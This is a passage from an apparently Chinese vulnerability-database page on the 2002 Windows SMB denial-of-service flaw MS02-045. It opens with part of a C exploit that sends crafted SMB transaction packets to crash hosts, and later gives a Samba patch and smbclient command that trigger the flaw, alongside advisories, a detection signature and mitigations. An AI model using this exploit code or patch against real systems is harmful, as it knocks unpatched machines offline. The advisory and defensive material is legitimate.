      printf ("Usage: %s [options] hostname/ip...\n", argv[0]);
      printf
        ("   -N [netbios-name]         Netbios Name (default: ask the remote host)\n");
      printf
        ("   -n [packets]              Number of crafted packets to send (default: %d)\n",
         packets);
      printf
        ("   -p [netbios-ns port]      UDP Port to query (default: %d)\n",
         netbios_ns_port);
      printf
        ("   -P [netbios-ssn port]     TCP Port to query (default: %d)\n",
         netbios_ssn_port);
      printf
        ("   -t [udp-timeout]          Timeout to wait for receive on UDP ports (default: %d)\n",
         udp_timeout);
      printf
        ("   -T [tcp-timeout]          Timeout to wait for receive on TCP ports (default: %d\n",
         tcp_timeout);
      printf ("\n");
      printf ("Known vulnerable systems: \n");
      printf ("    - Windows NT 4.0 Workstation/Server\n");
      printf ("    - Windows 2000 Professional/Advanced Server\n");
      printf ("    - Windows XP Professional/Home edition\n\n");
      exit (1);
    }

  if (!name
      && (name =
          list_netbios_names (buffer, sizeof (buffer), hostname,
                              netbios_ns_port, udp_timeout)) == NULL)
    exit (1);
  else
    name = extract_name (name);

  printf ("Using netbios name: %s\n", name);

  printf ("Connecting to remote host (%s:%d)...\n", hostname,
          netbios_ssn_port);

  fd = tcp_connect (hostname, netbios_ssn_port);

  if (fd == -1)
    exit (1);


  FD_ZERO (&rfds);
  FD_SET (fd, &rfds);

  tv.tv_sec = tcp_timeout;
  tv.tv_usec = 0;

  state = STATE_REQUESTING_SESSION_SETUP;

  request_session_setup (fd, name);

  for (;;)
    {
      if (!select (fd + 1, &rfds, NULL, NULL, &tv))
        {
          if (state == STATE_REQUESTING_TRANSACTION)
            {
              fprintf (stderr,
                       "Timeout during TCP read - Seems like the remote host has crashed\n");
              return 0;
            }
          else
            {
              fprintf (stderr,
                       "Nuke failed (tcp timeout) at state %#02x, exiting...\n",
                       state);
              return 1;
            }
        }

      r = read (fd, buffer, sizeof (buffer));

      if (r == 0)
        {
          printf
            ("Nuke failed at state %#02x (EOF, wrong netbios name ?), exiting...\n",
             state);
          exit (1);
        }

      if (((smb_header *) (buffer + 4))->error_class != 0)
        {
          fprintf (stderr, "Nuke failed at state %#02x, exiting...\n", state);
          exit (1);
        }

      switch (state)
        {
        case STATE_REQUESTING_SESSION_SETUP:
          printf ("Negotiating protocol...\n");
          negotiate_protocol (buffer, fd);
          break;
        case STATE_NEGOTIATING_PROTOCOL:
          printf ("Requesting session setup (AndX)\n");
          request_session_setup_andx (buffer, fd);
          break;
        case STATE_REQUESTING_SESSION_SETUP_ANDX:
          printf ("Requesting tree connect (AndX)\n");
          request_tree_connect_andx (buffer, fd, name);
          break;
        case STATE_REQUESTING_TREE_CONNECT_ANDX:
          for (i = 0; i < packets; i++)
            {
              printf ("Requesting transaction (nuking) #%d\n", i + 1);
              request_transaction (buffer, fd);
            }
	    printf ("Wait...\n");
          break;
        default:
          printf ("Seems like the nuke failed :/ (patched ?)\n");
	  exit (1);
        }

      state++;
    }

  return 0;
}
		

- 漏洞信息 (21747)

MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (2) (EDBID:21747)
windows dos
2002-08-22 Verified
0 zamolx3
N/A [点击下载]
source: http://www.securityfocus.com/bid/5556/info
 
Microsoft Windows operating systems use the Server Message Block (SMB) protocol to support services such as file and printer sharing. A buffer overflow vulnerability has been reporting in the handling of some malformed SMB requests.
 
An attacker may send a malformed SMB request packet in order to exploit this condition. It has been reported possible to corrupt heap memory, leading to a crash of the underlying system.
 
It may prove possible to exploit this vulnerability to execute arbitrary code and gain local access to the vulnerable system. This possibility has not, however, been confirmed.
 
Reportedly, this vulnerability may be exploited both as an authenticated user, and with anonymous access to the service.
 
It has been reported, by "Fabio Pietrosanti \(naif\)" <naif@blackhats.it>, that disabling the NetBIOS Null Session will prevent exploitation of this vulnerablity. 

http://www.exploit-db.com/sploits/21747.zip		

- 漏洞信息 (F29518)

iss.smb-dos.txt (PacketStormID:F29518)
2002-08-30 00:00:00
 
denial of service,overflow
windows,nt
CVE-2002-0724
[点击下载]

ISS Security Advisory - Windows NT, 2000, and XP can be crashed remotely by sending a malformed packet to port 139, triggering a heap overflow. MS02-045.

Internet Security Systems Security Alert
August 29, 2002

Microsoft Windows SMB Denial of Service Vulnerability

Synopsis:

A vulnerability has been reported in the Windows file and resource sharing
mechanism. The SMB (Server Message Block) protocol handles the sharing of
files and devices in Windows environments. A flaw in the implementation
of SMB may allow remote attackers to launch DoS (Denial of Service) attacks
against vulnerable systems.

Impact:

A remote attacker can cause a vulnerable system to crash by sending a
specially crafted SMB packet to an open NetBIOS port (TCP port 139).
These ports are typically filtered on outward facing Internet servers.
This vulnerability poses a significant DoS risk to unprotected home or
small/medium size business servers, or any servers not protected by basic
protection systems. An exploit tool for this vulnerability has been
released and is actively circulating in the computer underground. ISS
has detected increased scanning activity for this SMB vulnerability across
the Internet.

Affected Versions:

Microsoft Windows NT 4.0 Workstation
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Windows XP Professional

Description:

All affected versions of the Windows operating system are configured with the
vulnerable service enabled by default. SMB is a core component of Windows
networking technology. SMB clients and servers that share and provide network
resources such as files, printing sharing, or port sharing use the SMB
protocol to communicate.

A flaw in the Windows SMB implementation may allow attackers to craft special
packets to trigger a heap overflow. This overflow will allow the attack to
write data onto the heap, which triggers the DoS. X-Force has examined the
vulnerability in detail and believes that at this time, it is not possible to
control the data that is written onto the heap, therefore it is not possible
to execute arbitrary code by way of this vulnerability.

Recommendations:

X-Force recommends that all SMB traffic be filtered at the perimeter to block
this attack, and similiar attacks that involve incorrectly configured SMB
file shares. Windows XP users are encouraged to configure their Internet
Connection Firewall (ICF) to block SMB connections. This recommendation is
particularly significant for home users with "always-on" broadband
connections.

A workaround for this issue exists that may block the DoS attack from
unauthenticated, anonymous users. The local security policy for Windows NT,
2000, and XP allow anonymous connections, or "null sessions". If null
sessions  are disallowed, anonymous users cannot successfully exploit the
vulnerability. However, authenticated users can still execute the DoS
attack. To disable null sessions:

On Windows XP, open the Local Security Policy and enable the following
security options:
"Network Access: Do not allow anonymous enumeration of SAM accounts"
"Network access: Do not allow anonymous enumeration of SAM accounts
and shares"

On Windows 2000, enable:
"Additional restrictions for anonymous connections"

On Windows NT 4.0 SP3 and later, locate "restrictanonymous" in the following
key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA

"restrictanonymous" should be set to 1 to disable null sessions.

RealSecure 7.0 customers can configure a user-defined event to detect exploit
attempts.

alert tcp any any -> any 139 (msg: "DoS SMB";flags: A+;
content:"|504950455c4c414e4d414e00|";)

For more information on RealSecure 7.0 TRONS events, search for "trons" in
the ISS Knowledgebase: http://www.iss.net/support/knowledgebase/.

ISS X-Force will provide detection and assessment support for this
vulnerability in upcoming X-Press Updates for RealSecure Network Sensor and
Internet Scanner. RealSecure Network Sensor 6.5 and 7.0 can detect this
attack, as well as all SMB null session connection attempts with the
"Windows_Null_Session" event. Internet Scanner can currently assess if
systems are vulnerable to null session connections with the "NetBIOS shares
- null session" check. System Scanner can detect if null sessions are enabled
with the "reg-share-04" check.

Microsoft has released security patches for all affected versions. Please
refer to the Microsoft Security Bulletin referenced in the Additional
Information section.

Additional Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned the name
CAN-2002-0724 to this issue. This is a candidate for inclusion in the CVE
list (http://cve.mitre.org), which standardizes names for security problems.

Microsoft Security Bulletin MS02-45
http://www.microsoft.com/technet/security/bulletin/MS02-045.asp

Core Security Technologies Advisory
http://www.corest.com/common/showdoc.php?idx=262&idxseccion=10

X-Force Database
http://www.iss.net/security_center/static/9933.php

Microsoft Windows Internet Connection Firewall overview
http://www.microsoft.com/technet/prodtechnol/winxppro/proddocs/hnw_understanding_firewall.a
sp
    

- 漏洞信息

2074
Microsoft Windows Server Message Block (SMB) Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability

- 漏洞描述

A vulnerability has been discovered in the Windows Network Share Provider service (Lanman server) that would allow an attacker to remotely crash the operating system of an affected platform. This vulnerability can be triggered through an anonymous null session as well as a valid user account and requires network access to either port 139/tcp or 445/tcp.

- 时间线

2002-08-22 Unknow
Unknow Unknow

- 解决方案

Install Microsoft Windows Patch from Microsoft TechNet http://www.microsoft.com/technet/security/bulletin/ms02-045.asp, or block access to Port 139 and 445 (not applicable for file and printing environment). If possible remove Anonymous access.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Network Share Provider SMB Request Buffer Overflow Vulnerability
Boundary Condition Error 5556
Yes No
2002-08-22 12:00:00 2009-07-11 03:56:00
Credit is given to Alberto Solino and Hernan Ochoa.

- 受影响的程序版本

Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 0
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Cisco ICS Firmware 2.0
+ Cisco ICS 7750
Cisco ICS Firmware 1.0
+ Cisco ICS 7750
Cisco ICS 7750
Cisco Call Manager 3.2
+ Cisco VoIP Phone 7902G 0
+ Cisco VoIP Phone 7905G 0
+ Cisco VoIP Phone 7912G 0
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0

- 漏洞讨论

Microsoft Windows operating systems use the Server Message Block (SMB) protocol to support services such as file and printer sharing. A buffer overflow vulnerability has been reporting in the handling of some malformed SMB requests.

An attacker may send a malformed SMB request packet in order to exploit this condition. It has been reported possible to corrupt heap memory, leading to a crash of the underlying system.

It may prove possible to exploit this vulnerability to execute arbitrary code and gain local access to the vulnerable system. This possibility has not, however, been confirmed.

Reportedly, this vulnerability may be exploited both as an authenticated user, and with anonymous access to the service.

It has been reported, by "Fabio Pietrosanti \(naif\)" &lt;naif@blackhats.it&gt;, that disabling the NetBIOS Null Session will prevent exploitation of this vulnerablity.

- 漏洞利用

A Samba patch which allows exploitation of this issue is available:

Patch for samba-latest.tar.gz

Exploit with:

smbclient -L &lt;targetIP&gt; -N

--------------------

--- samba-2.2.5.original/source/libsmb/clirap.c Tue Jun 18 21:13:44 2002
+++ samba-2.2.5.exploit/source/libsmb/clirap.c Fri Aug 16 22:17:45 2002
@@ -237,8 +237,10 @@
STR_TERMINATE | STR_CONVERT | STR_ASCII);

if (cli_api(cli,
- param, PTR_DIFF(p,param), 8, /* params, length, max */
- NULL, 0, CLI_BUFFER_SIZE, /* data, length, max */
+// param, PTR_DIFF(p,param), 8, /* params, length, max */
+// NULL, 0, CLI_BUFFER_SIZE, /* data, length, max */
+ param, PTR_DIFF(p,param), 0,
+ NULL, 0, 0,
&amp;rparam, &amp;rprcnt, /* return params, return size */
&amp;rdata, &amp;rdrcnt /* return data, return size */
)) {

--------------------

A binary exploit has also been released. This exploit code has not been tested by Symantec. As always, caution is advised when dealing with binary code received from unknown sources. Exploit credit is given to Zamolx3 &lt;zamolx3@personal.ro&gt;.

An exploit has been provided by Frederic Deletang &lt;df@phear.org&gt;.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

It has been reported, by "Fabio Pietrosanti \(naif\)" <naif@blackhats.it>, that disabling the NetBIOS Null Session will prevent exploitation of this vulnerablity.

It is possible to reduce exposure to this issue by preventing port 445 from binding. On Windows 2000 systems, this can be accomplished with by removing the default value "\Device\" from the TransportBindName REG_SZ value from the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters

This system must be restarted for the registry changes to take effect.

Patches are available:


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows 2000 Professional SP3

Microsoft Windows NT Server 4.0 SP6a

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home

Microsoft Windows 2000 Server SP3

Microsoft Windows XP 64-bit Edition

Microsoft Windows XP Professional

Microsoft Windows XP 0

Cisco ICS Firmware 1.0

Cisco ICS Firmware 2.0

Cisco Call Manager 3.0

Cisco Call Manager 3.1 (3a)

Cisco Call Manager 3.1 (2)

Cisco Call Manager 3.1

Cisco Call Manager 3.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站